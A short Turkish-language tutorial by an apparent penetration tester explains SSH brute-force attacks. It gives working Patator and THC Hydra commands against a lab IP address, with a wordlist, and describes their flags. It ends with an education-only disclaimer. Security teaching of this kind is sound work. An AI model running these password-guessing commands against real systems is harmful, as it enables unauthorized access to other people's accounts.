Matematiksel bir sistem olan kaba kuvvet saldırıları, saldırgan tarafından bir sisteme “zorlayarak” girmek için kullanılır.
Örnekle açıklanması gerekirse önünüzde bir kapının olduğunu ve çantanızda da bir milyon adet anahtarın olduğunu düşünün. Kaba kuvvet saldırısı ile 10 dakika içerisinde bir milyon adet anahtarı kapıyı (sistemi) açmak için deneyebilirsiniz.
Şimdi de bazı SSH ve web servislerine kaba kuvvet saldırıları için kullanılabilecek araçları inceleyelim.
Patator
Patator Kali Linux işletim sisteminde kaba kuvvet saldırıları için kullanılan bir uygulama yöntemidir. Bu örneğimizde brute force saldırısı yapmak için uygulamayı kullanalım ve aşağıdaki komutu girelim:
patator ssh_login host=192.168.60.50 user=test password=FILE0 0=/root/wordlist -x ignore:mesg=’Authentication failed’
- ssh_login — Gerekli modüldür.
- host — Hedefimiz.
- user — Kullanıcı adı (örnek: fordefence) veya root isterseniz bir wordlist ekleyebilirsiniz.
- password — Brute force’ta kullanacağınız .txt dosyasında bulunan şifre listesi.
- -x ignore:mesg=’Authentication failed’ — Ekranda görmek istemediğiniz bir mesajı filtreleyeceğiniz komuttur.
THC Hydra
THC Hydra da Kali Linux üzerinden kullanılan bir uygulama olup, bu uygulama ile aynı şekilde brute force saldırısı gerçekleştirebilirsiniz:
hydra -V -f -t 4 -l test -P /root/wordlist ssh://192.168.60.50
- -V — Kaba kuvvet saldırısı sırasında login ve password kısmını görmenize olanak sağlar
- -f — Şifre bulunduğunda durur
- -P — Şifre kombinasyonlarının içerdiği dosya uzantısı
- ssh://192.168.60.50 — Saldırı yapacağınız kurbanın ip adresi.
Tuğkan ARSEVEN
Sızma Testi Uzmanı
Bu makalede verilen tüm materyaller eğitim amaçlıdır. Materyallerin yasa dışı amaçlarla kullanılması yasaktır.
